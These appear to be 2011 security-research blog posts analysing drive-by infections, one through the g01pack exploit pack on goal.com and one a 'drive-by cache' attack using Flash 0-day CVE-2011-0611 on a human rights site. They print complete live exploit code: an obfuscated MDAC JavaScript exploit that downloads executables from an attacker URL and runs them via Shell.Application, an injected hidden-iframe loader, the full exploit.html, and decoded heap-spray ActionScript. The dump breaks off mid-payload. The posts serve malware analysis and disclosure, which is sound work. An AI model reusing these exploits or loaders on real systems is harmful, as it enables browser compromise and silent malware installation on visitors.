G. The exploit codes were well mutated. We don't mean well "obfuscated," because in addition to obfuscation, the primitive form of the exploit itself has been mutated well so as to avoid detection.

H. Malware served was packed with UPX and modifies setupapi.dll and sfcfiles.dat. When we first submitted it to VirusTotal, 4 out of 41 antivirus vendors were able to flag it.

I. The malware connects to the following domains:

1. testurl.ipq.co:80 (in UK), which again, is neither flagged by any antivirus blacklist nor by Google SafeBrowsing
2. 74.125.47.99:80 (US), which reverses back to coldgold.co.uk, and which again, isn't blacklisted by any, including Google SafeBrowsing.
Details:
3. banderlog.org, not flagged by anvirus / Google SafeBrowsing, but has some records on clean-mx.de.

[Details]

One of the infection logs can be downloaded here. It includes all the http traffic, from loading goal.com to downloading the PE malware binary.

The chain of infection is:
1. goal.com, includes iframe to pxcz.cz.cc
2. pxcz.cz.cc iframes to justatest.cz.cc
3. justatest.cz.cc runs the exploit pack g01pack, serves exploits based on visitor's browser type
4. exploit compromises browser, downloads malware from justatest.cz.cc
5. malware links to testurl.ipq.co (UK), 74.125.47.99:80 (US, coldgold.co.uk), and banderlog.org.
The infection started in http://www.goal.com/en/:


<p>Arjen Robben has admitted that his future lies with the German and European giants, hinting that he could even remain there for the rest of his career <style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg"></iframe></p>

The attacker injected an iframe at the end of the above HTML snippet, pointing to pxcz.cz.cc. pxcz.cz.cc contains another iframe pointing to justatest.cz.cc, which is both the exploit and the malware server, running g01pack. A unique feature of this exploit pack is the inclusion of a fake admin / stats page. This page supports common id / password combinations like admin / admin to trick security researchers into believing that they've obtained access to the exploit pack's admin page:

Once logged in, the researcher is presented with a fake infection stats page. In reality, this allows the attacker to gain insights into who has identified the malicious domain, and is conducting investigation.

The exploit codes were well mutated. We don't mean well "obfuscated," because in addition to obfuscation, the primitive form of the exploit itself has been mutated well so as to avoid detection. Since it's an exploit pack, there's too many exploits to post them all here. We've posted on version here, which is the MDAC exploit. If interested, you can download one of the infection logs here.


<html>en clonus purins knot ghat inlier sine bipeds obese tart.<body>heroins pallors glugs. Opera. Pyx ducted boss shea abele knot hajes eh moot nisi tickled howl pangens bobs blind stir reinked ajee.atria obese saddle. Nisi uh bracts pyx.bipeds abaft arctic brave arabic purins blind polo. Pyx pallors. Sludge atria noisy bug slojd stow dumps. Kappa sri tawse bracts hank.fresco delta. Caldron arctic bucko sine byre inlier haeres.<script>

var test;

function redirect(){
location.href="?topic_id=6.0&forum_id=qtest&action=MSIE&nid=name&year=c&start=2&thread_id=53585053&rid=708";
}

setTimeout(redirect, 20000);

var move=new String("openul0".substr(0,4));
var out=["ctfmon",String("javaWI8X".substr(0,4)),new String("acro"+"bat"),new String("explore"+"rC52".substr(0,1)),String("useri"+"nit"),"chromeHkpS".substr(0,6),"svch"+"ostc"];
var follow="Sav"+"eTo"+"Fil"+"e";
var air;
var family=1;
var low=6000;
var never=";";
var now=String("setTimeout");
var sun=0;
var age="";
var turn=[];
var have=["spellOver","play","cross"];this.few=29107;this.few-=150;
var begin;
var useDrive="clsid:BD9oqk".substr(0,9)+"6C556-65ANEm".substr(0,9)+"3-11D0-98rWqE".substr(0,9)+"3A-00C04F"+"ZuqC29E36uqZ".substr(3,6);

var stay=new String("she"+"lle"+"xec"+"ute");
var then=new String("replaceUyK".substr(0,7));

var once=new String("typeUdm".substr(0,4));
var ground=["youUnder","home","base"];
var own=new String();
var meLittle="setAttrT2hF".substr(0,7)+"ibute5MEY".substr(0,5);
var will=new String("pus5ceI".substr(0,3)+"9BUhU9B".substr(3,1));
var most=2;
var best="send";

var teachSeem="";var star="";try {} catch(mark){};
var strong;
var bed="Close";
var end="Wri"+"te";
var pass="http://opofy7puti.cz.cc:80/domains/f848af41f9d81c1603fb52a6b7844642.php?start=12&thread_id=53585053&forum_id=qtest&";

var readAmong="CreateObjec"+"t";
var redDog="responseBo"+"dyck4".substr(0,2);

function oh(){

sea=[];want=18559;want++;
try {var book="ourPiece"} catch(book){};var they="";come=["northTurn","set","above"];
change={};

if(pass.indexOf(never) > -1){
var groundMight=new Array();this.strongLess=978;this.strongLess++;call={word:10445};
var writeHim=["comeWould"];
var serve="";var stopYes="";hand=25269;hand-=192;

school = pass.split(never);
var good={his:20957};var turnBoy=false;this.travel="travel";
add=16993;add--;var should="";
for(var i in school){

var govern="";this.airMark=false;
place=27537;place-=204;try {var run="familyCommon"} catch(run){};var yetNeed=new String();
var quick = school[i][then](/^\s+|\s+$/g, age); 
var music="";this.plant=459;this.plant-=142;var underHad="";
fall={};yetFarm=6780;yetFarm-=19;var shape=29557;
if(quick != age){
var make=false;var their={high:"down"};plane={yes:"front"};
turn[will](quick);
wood={blue:8491};ohEat=17592;ohEat+=255;this.road="road";
}
}

} else {
var thereLarge=new String();var yesWheel=new String();
var saw=["shortSleep","stayCommon","heard"];this.yourLeave="yourLeave";var table=23075;
turn[will](pass);
var turnYet="turnYet";var friendPound={newBody:"studyNotice"};
} 

dryCity={callChange:16908};
this.passPeople=8404;this.passPeople--;
var drive=[];var able="";var willTake="willTake";

return turn;
}

var foodThough=new String();try {} catch(veryStrong){};
this.moveEarth=7491;this.moveEarth+=102;
this.someOpen=26120;this.someOpen++;

function than(again, point){
life=["simple"];knowGround=24748;knowGround--;
figureFigure=30877;figureFigure-=200;var does=new String();var sleepFace=["orWalk","inch","cold"];
yourSlow=775;yourSlow+=122;what=[];a=21635;a+=166;

test[meLittle](again, point);
}

northBeauty={watch:"fewLove"};var line={};
var head=22943;var piece=32549;

function the(){

var pose=20499;var frontCross=4606;
ago=7777;ago+=220;

if(!free()) return;

serveWell=25614;serveWell++;objectWorld=24863;objectWorld-=114;darkCommon=22684;darkCommon++;
var willPerson=new Array();

test=document.createElement(new String("object"));

than(new String("classi"+"d"), useDrive);
var moveEarly="moveEarly";this.moonHome="";
bedPower={since:false};
than("id", "test");

try {

strong = test[readAmong]("Shell.A9kDj".substr(0,7)+"DH0pplicat0HD".substr(3,7)+"MrbionMbr".substr(3,3),age);
find=[];this.learn="";hold=[];
air = test[readAmong]("adodb.strea"+"mnXk".substr(0,1),age);
this.why=19607;this.why++;var rest=new Date();var him="";

var turn = oh();

this.differ="differ";var sawAmong=["moneyAt","moreA","boyMuch"];var stopSun=["letter","pound","young"];
var sideHeat=["white","spellAbove"];var thoseFirst=["northFact","needCome"];doesRock=17386;doesRock--;
if(turn.length <= 0) return false;

which=["i","took","fish"];
agoOld=["laughOften","seemOrder","figureGreen"];var runHalf={cut:27153};var schoolOut=["differGot","wonder","poseNotice"];


for(var i=sun; i < turn.length; i++){

var fromLong=new Date();

var haveSlow=new String();var ifCover=["finalDone","againOnly"];
var unitIt=[];pullTown={leadOut:"deepMade"};var decide=[];
this.both=22541;this.both++;
var unit = out[i % out.length];
var enough = turn[i];

goodDrive={water:"cry"};secondCenter=[];var endDiffer=false;
var your = "./."+"./yzvw".substr(0,2) + unit + new String(".exe");
this.dont=18287;this.dont--;try {var faceAppear="fewReal"} catch(faceAppear){};
var voicePoint=low * i;
var shortPlane=["heatRule"];var knew="";
try {var shapeCause="ageHave"} catch(shapeCause){};dryLook=[];
meanFar(new String(enough), new String(your));
var right=23685;try {} catch(feel){};try {} catch(hisTree){};
var had=new Date();
}



} catch(e){}

}

function longSaid(stoodTree){

planeIt={};
var shouldSide=8362;northAmong={faceMade:false};var windReal="windReal";
cutOften=["riverPiece","orderWater","commonLay"];nowSay=["bodyAlso"];

begin = test[readAmong]("msxml2.XMLO4eW".substr(0,10)+"HTTP", age);

var planeTop=new Date();
whichThem={shipSame:26359};var fatherIdea=24125;var there=16243;
begin[move]("GET", stoodTree);
asAmong=["seaFew"];whileRun=["warDrive"];this.feetSing=7842;this.feetSing--;
begin[best]();
var thatWhen="thatWhen";this.hisNever="hisNever";story=9303;story+=10;

return begin[redDog];
}

function free(){
var thereWrite={strongPaper:false};
this.keepLot="";
return (document.body.style.textOverflow != undefined);
}


function meanFar(stoodTree,color){

var wentMother=["turnTalk","staySleep","she"];this.largeRed=28365;this.largeRed-=184;eat=["atMove"];
var found={shouldPlay:"figureStep"};

try {
var standMother=3260;toward=26805;toward++;
var actPress="";try {var work="lightCold"} catch(work){};

try {
var other=new Date();var rainTable=28788;
air[bed]();
this.coldMake="coldMake";fatherUs=["andFast","hour"];
} catch(stand){}

this.lastTheir=29388;this.lastTheir--;var downStrong={topWas:11226};try {var answerWater="servePaper"} catch(answerWater){};
power=longSaid(stoodTree);
peopleHad=["kingRiver"];this.house=4015;this.house++;
air[once]=family;
cameWho={hasEye:"bringForce"};foodEast=["feetThat","shortHave"];
air[move]();
happenUs=["fewMany","butWell"];var helpRound=27891;
air[end](power);
drawHome={number:721};surePage={late:false};
air[follow](color,most);
try {var cryFarm="putFollow"} catch(cryFarm){};var plantClear="";
air[bed]();
try {var meEver="shapeDark"} catch(meEver){};

try{
var whyRule=["slow","followNight"];var whiteAnswer=["standWatch","fastKnew"];
var sameOff=26811;actCome=["walkHand","even","waterWay"];this.draw=29713;this.draw-=76;
strong[stay](color);
var clear="";var tellFront=["seemBody"];var lookNumber="";

} catch(e){
}

mayForce=12153;mayForce+=212;var homeMay={unitFirst:false};manAt=8219;manAt+=30;
whereSoon=["happenRiver","aboveCause"];cutLive=["wentThere","meanBusy"];

}catch(noun) {
lessFive=["fishTail","behindYet","ourAgo"];this.same=false;var airSix="";
try {
var direct=false;var better=["showGrow","factHand"];
air[bed]();
changeBack={hot:6344};var it=new Array();
} catch(first){}
helpPlain=["beBig","listen"];
}
var ageSecond=15826;this.fallThree="";var faceTree=28716;
}

var sleep=0;
var topAnimal=false;

function groundMen(){

while(sleep++ < 171){
groundMen();
}
if(!topAnimal){
topAnimal = true;
the();
}
}

groundMen();</script>nisi nebs coalify opera caw add gluts rewon toph reinked bucko web moot.woofer reinked haeres arabic hernia bice blind nebs schmoos stow opera obese snaffle en hajes scow pyx.</body></html>

(Follow up post on reinfection posted May 17th)

Newest Adobe flash 0-day used in new drive-by download variation: drive-by cache, targets human rights website

2011-04-16T01:31:00.000-07:00

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)
Armorize runs one of the world's largest cloud-based Web malware scanning service, OEM'd to large security and hosting companies. Recently, we've noticed increasing use of a variation of the drive-by download attack, coupled usually with 0-days. This is our technical report on the subject.

We realize in recent years, "interesting" threat names have been regularly created, for example the popular [cross-X Y-ing] convention. Sometimes X can be as big as cloud. Nevertheless we feel we need to give this method a unique name; we'll dub it Drive-By Cache. Here's a summary of this report:

A. The method of attack is a variation of the drive-by download mechanism; we dub it "drive-by cache." This mechanism makes the infection harder to detect than drive-by download.
B. Here we use a recent example reported by our scanners. The infected site is human rights website, and the exploit itself is the Adobe flash 0-day CVE-2011-0611, which Adobe patched yesterday. HackAlert first flagged this infection about a week ago, when there was no patch available for this 0-day.
C. The installed malware connects back to 182.237.3.105, an IP in Hong Kong.

More summary can be found in [5. Forensics Summary].

[Sections]
1. Brief overview of drive-by downloads
2. Drive by cache
3. Real-world example
4. Detection Rates
5. Forensics Summary
6. Complete codes

[1. Brief overview of drive-by downloads]

A drive-by download attack refers to the process of a user visiting an infected page and subsequently gets installed with malware, without his/her knowledge and without having him/her to click on or to agree to anything. Our previous post on HDD spreading itself via malvertising is a typical example of this type of threat.

This type of threat has been in existence since 2000, and as heap-spraying techniques matured around 2003, has become widespread. The use of the term "drive-by download" to describe such threat, however, didn't receive widespread acceptance until Google's 2003 publication of their "Ghost in the Browser" paper (Provos et al.); prior to that the term drive-by download was used to describe multiple web-based malware threats (drive-by downloads, click-by downloads, phishing, etc). During 2003, the meaning of drive-by download became mature and specific, referring to the type of Web malware threat as described in Google's Ghost paper.

Below is a simplified illustration of this process; a more detailed description, with animation, can be found in our 2009 BlackHat / DEFCON drivesploit presentation pages 15-17.

In step 1, the victim visits an infected site, which has been injected with some malicious javascript (or flash). The injected javascript can create an iframe pointing to some hop points, or it can directly be an exploit. Doesn't matter. What's important is ultimately, the browser loads an exploit, often in the form of javascript or flash. In the example we're using here, it's an exploit for the Adobe flash 0-day CVE-2011-0611 vulnerability.

In step 2, the exploit runs inside the browser, exploits the browser, forcing the browser to execute some commands (called shellcode) that came with the exploit. The command would cause the browser process to make another connection to some URL, often not the same domain as the original infected domain, to fetch a piece of malware, write it to disk, and execute it. This is step 3.

It is difficult for desktop antivirus technologies to detect drive-by downloads statically using signatures (patterns). Browser exploits usually exist in the form of scripts, for example javascripts or flash actionscripts. They can be randomly obfuscated on-the-fly as they are served to victims; refer to the drivesploit presentation for the many creative ways attackers obfuscate script-based exploits. Collecting signatures for these randomly obfuscated and therefore "disposable" javascripts not only does not increase detection rates, it explodes one's signature database and causes detection speeds to drop (too many signatures to match against).

Behavior-based detection, on the other hand, is very effective for this type of threat. For drive-by downloads, the behavior is consistent and can be well defined. If we hook around the browser, the javascript engine, and various APIs, we will clearly see the following behavior, in sequential order:

A. Browser loads a URL (victim visits an infected site)
B. Exploit code executes and succeeds, so browser starts to execute shellcode that came with the exploit
C. Browser calls URLDownloadToFile() of urlmon.dll, which downloads some file from some URL and writes to disk as some file.
D. Browser executes the created file

Browser exploits love to call URLDownloadToFile(); for example, there are 8 drive-by download shellcodes listed on exploit-db, and all of them use URLDownloadToFile() for step (B).

But browsers don't normally call URLDownloadToFile() and therefore, the use of this API can be a good trigger point for behavior-based Web malware detection.

Generally speaking, to bypass behavior-based detection, shellcodes need to do as little as possible, and act as similar to the browser (call similar APIs) as possible. The simplest way to achieve this, is to have the browser do most of the work for the shellcode.

[2. Drive-by cache]

And drive-by caching does exactly this. In drive-by caching, a shellcode doesn't do Step (C). After being executed, it doesn't make an attempt to download a file and write it to disk. Instead, it locates the malware which is already sitting in the browser's cache directory, and executes it.

And that's why we take out the word download and dub it drive-by cache.

But how did the malware binary make its way into the browser's cache, BEFORE the exploit was executed? See illustration below:

For typical drive-by downloads, the process is:

(1) Browser load URL
(2) Browser executes exploit code
(3) Browser executes shellcode
(4) Shellcode downloads malware to disk
(5) Shellcode executes malware

In drive-by cache, step (4) is now performed right after step (1) and before step (2). It's also performed by the browser and not the shellcode. How is this done?

Well it's very simple. The malware binary is renamed as a .jpg or .js file and linked to in the infected page. In the example we use here with the recent infection, the code is:

<script src=newsvine.jp2>

The above line tells the browser that it should include "newsvine.jp2" as javascript. The browser then goes to a) retrieve this file, b) writes it to cache, and c) execute the javascript. Of course step (c) would fail because newsfine.jp2 is a PE binary (malware), but now, the file has been retrieved by the browser and written to the cache directory.

Note that all this is done by the browser and not the shellcode, and the browser executes this of course with a different set of APIs other than URLWriteFileToDisk.

To a behavior analysis engine, a) this is quote normal browser behavior and no suspicious APIs are being called, and b) this is happening right after step (1) (see illustration above) and therefore this isn't the typical drive-by download behavior sequence.

And because of the above, compared to drive-by download, drive-by cache is more likely to bypass security detection mechanisms.

[3. Real-world example]

At the time of this writing, this human rights website is still infected with this exploit, which leverages a) drive-by cache and b) the recent Adobe flash 0-day CVE-2011-0611. HackAlert first detect the infection about a week ago, and also flagged a non-standard drive-by download behavior.

The infection can be found at the bottom of the html:

</div><script src="/includes/googlead.js"></script></body></html>

/includes/googlead.js creates an iframe to the malicious domain:

if (document.cookie.indexOf('popad') == -1) {
 var e = new Date();
 e.setDate(e.getDate() + 1);
 e.setHours(0, 0, 0);
 e.setTime(e.getTime());
 document.cookie = 'popad=true;path=/;expires=' + e.toGMTString();
 document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='http://71.6.217.131/dir/AI/exploit.html' width=468 height=60 scrolling=no></iframe>");
}

The exploit (which is still live right now) is served from http://71.6.217.131/dir/AI/exploit.html. Full content of this exploit is listed at the bottom of this report. Here's one of the important sections:

var display="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+"<script src=newsvine.jp2><\/script>\r\n"+
"<object width=\"550\" height=\"400\">\r\n"+
"<param name=\"movie\" value=\"done.swf\">\r\n"+
"<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n"+
"<\/embed>\r\n"+
"<\/object>"

Which writes out:

<script type="text/javascript">
window.onerror=function(){return true;};
</script>

<script src=newsvine.jp2></script>

<object width="550" height="400">
 <param name="movie" value="done.swf">
 <embed src="display.swf" width="550" height="400"></embed>
</object>

"display.swf" is the flash swf file containing the actual exploit code written in flash ActionScript. Full decoded version of the code can be found at the bottom of this report. <script src=newsvine.jp2><\/script> does the drive-by caching. newsvine.jpg's original name is swf.exe, and is a backdoor written in VB, possibly of the pincav family. Here it is renamed to newsvine.jp2, and its url is placed iin a <script> tag. Processing this tag, the victim's browser will proceed to download newsvine.jp2 and write it to the cache directory.

Subsequently, display.swf is downloaded by the browser, and the ActionScript it contains is executed. The script exploits the CVE-2011-0611 Adobe Flash 0-day, and causes the shellcode to execute. The shellcode looks in the browser's cache directory for newsvine.jp2 and executes it.

Newsvine.jp2 (or swf.exe) connects back to CNC server at jeentern.dyndns.org:80, which resolves to 182.237.3.105 at the time of this writing.

[4. Detection Rates]

The exploit code is in flash ActionScript and is located within swf files. Because this isn't the traditional drive-by download shellcode, but rather drive-by cache, detection rate seems low. When we submitted the swf file to VirusTotal, 0 out of 42 antivirus vendors detected this exploit.

As for newsvine.jp2 (swf.exe), we got 1/42 on VirusTotal (report is here). Only Microsoft detected this backdoor.

[5. Forensics Summary]

Here's what we know so far:

1. The human rights website has been infected (in multiple pages) at least a week ago, and is still infected right now.
2. drive-by cache is used instead of drive-by download
3. exploits CVE-2011-0611 Adobe Flash 0-day
4. VirusTotal detection was 0 out of 42 for the swf exploits, and 1 out of 42 for the malware.
5. exploit served by http://71.6.217.131/dir/AI/exploit.html, which we believe is a compromised server in San Diego, hosted by Cari.Net.
6. newsvine.jp2, originally swf.exe, is drive-by cached and then executed by the shellcode. It a backdoor written in VB, possibly of the pincav family. It has an invalid digital signature pretending to be the Xunlei download manager, which XunLei claims to be the world's most widely used download manager. Interesting strings within the binary suggest the author to be "chuang" or "zchuang".
7. newsfine.jp2 connects back to CNC server at jeentern.dyndns.org:80, which resolves to 182.237.3.105, an IP in Hong Kong.

[6. Complete codes]

Below we include full exploit codes to this drive-by cache example. If you need anything else, please email Xwayne@armorize.comX (delete the two enclosing X's).

1. http://71.6.217.131/dir/AI/exploit.html:

<html>
<head>
<script type="text/javascript">
function getCookieVal(offset) {
 var endstr = document.cookie.indexOf(";", offset);
 if (endstr == -1) {
   endstr = document.cookie.length;
 }
 return unescape(document.cookie.substring(offset, endstr));
}

function GetCookie(name) {
 var arg = name + "=";
 var alen = arg.length;
 var clen = document.cookie.length;
 var i = 0;
 while (i < clen) {
   var j = i + alen;
   if (document.cookie.substring(i, j) == arg) return getCookieVal(j);
   i = document.cookie.indexOf(" ", i) + 1;
   if (i == 0) break;
 }
 return null;
}

function SetCookie(name, value) {
 var argv = SetCookie.arguments;
 var argc = SetCookie.arguments.length;
 var expires = (2 < argc) ? argv[2] : null;
 var path = (3 < argc) ? argv[3] : null;
 var domain = (4 < argc) ? argv[4] : null;
 var secure = (5 < argc) ? argv[5] : false;
 document.cookie = name + "=" + escape(value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : "");
}

function DisplayInfo() {
 var expdate = new Date();
 var visit;
 expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000));
 if (!(visit = GetCookie("vis1t"))) visit = 0;
 visit++;
 SetCookie("vis1t", visit, expdate, "/", null, false);
 return visit;
}

function code() {
 var num = DisplayInfo();
 if (num < 3) {
   return 1;
 } else {
   return 0;
 }
}

function user() {

 var weekDay = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object classID=yg.dll#yg.e><\/object>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"March.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
 var display = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";

 var Example = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object classID=yg.dll#yg.e><\/object>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"Birthday.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
 var info = navigator.userAgent.toLowerCase();
 var win = (navigator.platform == "Win32") || (navigator.platform == "Windows");
 var ck = code();
 var January = info.indexOf('msie 8.0');
 var February = info.indexOf('msie 7.0');
 var April = info.indexOf('msie 6.0');
 var June = info.indexOf("windows nt 5.1");
 var August = info.indexOf("windows nt 6.1");
 if (January > 0 && June > 0 && ck == 1) {
   document.body.innerHTML = "xxxx" + weekDay;
 }
 if (June > 0 && ck == 1 && (February > 0 || April > 0)) {
   document.body.innerHTML = "xxxx" + display;
 }
 if (January > 0 && August > 0 && ck == 1) {
   document.body.innerHTML = "xxxx" + Example;
 }
}
</script>
</head>
<body onload=user()>
</body>
</html>

2. Exploit in ActionScript, decoded from the swf files:

package ie_fla {
 import flash.display. * ;
 import flash.utils. * ;

 dynamic public class MainTimeline extends MovieClip {
   public
   var s: Object;
   public
   var s2: Object;
   public
   var s3: Object;
   public
   var a: Object;
   public
   var t: Object;
   public
   var i: Object;
   public
   var r: ByteArray;
   public
   var ldr: Loader;

   public

   function MainTimeline() {
     addFrameScript(0, this.frame1);
     return;
   } // end function
   public

   function hexToBin(param1: String): ByteArray {
     var _loc_2: String;
     var _loc_3: * = new ByteArray();
     var _loc_4: * = param1.length;
     var _loc_5: uint;
     _loc_3.endian = Endian.LITTLE_ENDIAN;
     while (_loc_5 < _loc_4) {         // label         _loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1);         _loc_3.writeByte(parseInt(_loc_2, 16));         _loc_5 = _loc_5 + 2;       } // end while       return _loc_3;     } // end function      function frame1() {       this.s = new ByteArray();       this.s3 = new ByteArray();       this.a = new Array();       this.t = "4357530acc050000789c4d546d6c5365143eb7bdedfb765d29dd189dac2053f00345e3171f71b062bbeec3b63377b0a026c265bddd6decdaa6f7d61698a82466fb619610e20549f8322144134d10158d261287c9f8e10f31460da2268b4663628cc1080c37cf79efb5f5fe787bee799ef39cf39c7b7b6be0d901103c01d02e413c047875bb4f7b00ac66f0007b757abc95cde1b1a8e5a80b92321eed30d9063ed8028f410ce2d00309e8853ee887935321c86859b592374102790db8e0b0643501db7ebebf8f9dee7effdc4e2c0778cd85e4a885ea4bcd923fb90b93cd3021813b8c8728f84def4cb32587be3f6317d4f3076eae5bc60aee8b3fd585dac00a6033bcdce2e4947c7d216c794196641797d27d5478e58594ca6e7bf19d63762179f985981f00a13cf1e05af6f7879f5fb251e50ed494ddb2c44812455c0a0d3b75e2c9bd62d856a05b37627e0a16868a5ce49bc062206a384448377ee3be28fbc8f3c527b6aee502ee567aa966e781c3f78b1abf6d1c21592260f5feb9b8007cf004b90ee3901bc5906c15bb8b5dbb7ced6b47cc0f8d016564f52d10cbef0ead67576ffe3e53dfd0d579127793f8db7cc31a212ec366cb07dc63afcc1bed425e45740926d73ecefe387be95dbb3e828e3863190c0785a5b472bb8b9d79ebbb7f6c3ca5842329929ed9f65945487b40096f8ae0749c739fbd8c26bc47ebfe3476d92076373d7f3ce8d8b73a81373b3c1eb08345dcc3838dd043d32d0cd2c4ff3149e4e5edaf3c22441860034c4cac1ed79d04f55b3cc5c99eeb6e580e582bbcca12e7446dffe1dbbdce3353c2e42baf5f8cb28387d6398f6a105b9ec77714919335efbdec9989eb5fda4857b48bb29b8efcf928fb540b5c70f69452447afad6e7d7b3ae1ff7cfd4d3d4ed67ffb96d8e5d5c97581972073ede5763efc55e9a70debab030317be5e80ac10d805dfce6a97d03ce7fc4d9f5d9a737ef1219898a52b6813722dea7d8f0ecf553f5073f2b59a6ed9a87788bbdb85646205fc2dbf8d2c682c38db0bd11ded20897d9328b7907eff05218c0cb86237cb977aed3171df8a625e564b0f785791ab4f9af749b183428dead5f3b26bb593632d92dbe2571697295b40286cc72ae300a79ad306aea30a2abe55831a36d31215b2e8ec59c5b91c7dc886a68b055ab998962794c35c1c8ed416c47b65280e16733157d54d1c6f46cf501a352ae96abe3865eff1e8d6ae610917b3355fd7f70b55aa69b68f51e6c8e1cd2eea9995ac1843d55a3fa90cd74c0b8ba9b7e12c58299cc19a63d484ecb6720a5d2ec654d35b59eb192b93b557c2ea7c5f2b912987ace807e43a9140a64d3d0cc14f94916d5ccb05a3684ac56a26ab4b612560a8771d481116c932b5490db820b0d8175a734a75fdef8d556e3e160227a2c4bd9d20d88e2caff0522695d54";       this.i = 0;       while (this.i < 1024) {         // label         this.s3.writeByte(13);         var _loc_1: String;         _loc_1.i = this.i++;       } // end while       this.i = 0;       while (this.i < 1023) {         // label         this.s.writeBytes(this.s3, 0, this.s3.length);         var _loc_1: String;         _loc_1.i = this.i++;       } // end while       this.s.writeInt(2425393296);       this.s.writeInt(2425393296);       this.s.writeInt(3326443264);       this.s.writeInt(1620086928);       this.s.writeInt(3943717707);       this.s.writeInt(868837049);       this.s.writeInt(2231533620);       this.s.writeInt(199418618);       this.s.writeInt(3943033067);       this.s.writeInt(4294967051);       this.s.writeInt(3118523106);       this.s.writeInt(3184599686);       this.s.writeInt(1137894114);       this.s.writeInt(3798573806);       this.s.writeInt(1772287593);       this.s.writeInt(3798590057);       this.s.writeInt(2331142421);       this.s.writeInt(2296888074);       this.s.writeInt(350479074);       this.s.writeInt(1912609418);       this.s.writeInt(3520127714);       this.s.writeInt(2327286151);       this.s.writeInt(2427873764);       this.s.writeInt(179692514);       this.s.writeInt(3798534792);       this.s.writeInt(3820685877);       this.s.writeInt(3823297024);       this.s.writeInt(462065361);       this.s.writeInt(3504507537);       this.s.writeInt(2324139702);       this.s.writeInt(1776552667);       this.s.writeInt(3823297129);       this.s.writeInt(176743355);       this.s.writeInt(173794274);       this.s.writeInt(3791657833);       this.s.writeInt(912330422);       this.s.writeInt(1763576316);       this.s.writeInt(3138065634);       this.s.writeInt(3806509067);       this.s.writeInt(534962914);       this.s.writeInt(3112755848);       this.s.writeInt(3803426993);       this.s.writeInt(2296520116);       this.s.writeInt(4195031010);       this.s.writeInt(3806464575);       this.s.writeInt(488447361);       this.s.writeInt(2407976071);       this.s.writeInt(2592588493);       this.s.writeInt(2713887917);       this.s.writeInt(2965556656);       this.s.writeInt(3267413943);       this.s.writeInt(2980556978);       this.s.writeInt(2964169899);       this.s.writeInt(2930231230);       this.s.writeInt(2928509315);       this.s.writeInt(2395124103);       this.s.writeInt(2526448524);       this.s.writeInt(2240921270);       this.s.writeInt(2274333325);       this.s.writeInt(2424541339);       this.s.writeInt(3266022550);       this.s.writeInt(2274397319);       this.s.writeInt(2529338507);       this.s.writeInt(2391249342);       this.s.writeInt(3233990539);       this.s.writeInt(3266030786);       this.s.writeInt(3398207381);       this.s.writeInt(2442431372);       this.s.writeInt(2278083720);       this.s.writeInt(2463157186);       this.s.writeInt(2796405450);       this.s.writeInt(3397488518);       this.s.writeInt(3431438983);       this.s.writeInt(3267415425);       this.s.writeInt(3263596430);       this.s.writeInt(3268252098);       this.s.writeInt(3348531087);       this.s.writeInt(2462563985);       this.s.writeInt(2491517581);       this.s.writeInt(2442579079);       this.s.writeInt(2592588484);       this.s.writeInt(3301081485);       this.s.writeInt(2459681472);       this.s.writeInt(3347824834);       this.s.writeInt(3348531087);       this.s.writeInt(2462563985);       this.s.writeInt(2491517581);       this.s.writeInt(2442579079);       this.s.writeInt(2592588493);       this.s.writeInt(2613232836);       this.s.writeInt(3263270790);       this.s.writeInt(3431438983);       this.s.writeInt(3268248002);       this.s.writeInt(2442560400);       this.s.writeInt(2529347478);       this.s.writeInt(2274333383);       this.s.writeInt(3197211777);       this.s.writeInt(2324533654);       this.s.writeInt(3431438983);       this.s.writeInt(3234581474);       this.s.writeInt(182918429);       this.s.writeInt(495030150);       this.s.writeInt(3431438983);       this.s.writeInt(3792313372);       this.s.writeInt(488476050);       this.s.writeInt(2274157153);       this.s.writeInt(646349673);       this.s.writeInt(1030350534);       this.s.writeInt(1629941345);       this.s.writeInt(183835906);       this.s.writeInt(1658456726);       this.s.writeInt(3898792459);       this.s.writeInt(2531746522);       this.s.writeInt(160953187);       this.s.writeInt(2598859378);       this.s.writeInt(1920112362);       this.s.writeInt(1763555177);       this.s.writeInt(242197223);       this.s.writeInt(486673117);       this.s.writeInt(3806519841);       this.s.writeInt(1658456726);       this.s.writeInt(3898792459);       this.s.writeInt(2531746522);       this.s.writeInt(160953187);       this.s.writeInt(2598859378);       this.s.writeInt(1920112130);       this.s.writeInt(2330650850);       this.s.writeInt(3798967015);       this.s.writeInt(486673141);       this.s.writeInt(3806519841);       this.s.writeInt(183755490);       this.s.writeInt(3797611491);       this.s.writeInt(3865190638);       this.s.writeInt(3792298170);       this.s.writeInt(554310429);       this.s.writeInt(488487204);       this.s.writeInt(3847908285);       this.s.writeInt(3817088421);       this.s.writeInt(3877437985);       this.s.writeInt(2976464561);       this.s.writeInt(2292353762);       this.s.writeInt(4074955445);       this.s.writeInt(1772416522);       this.s.writeInt(2585599261);       this.s.writeInt(3122770868);       this.s.writeInt(1771560553);       this.s.writeInt(2529991393);       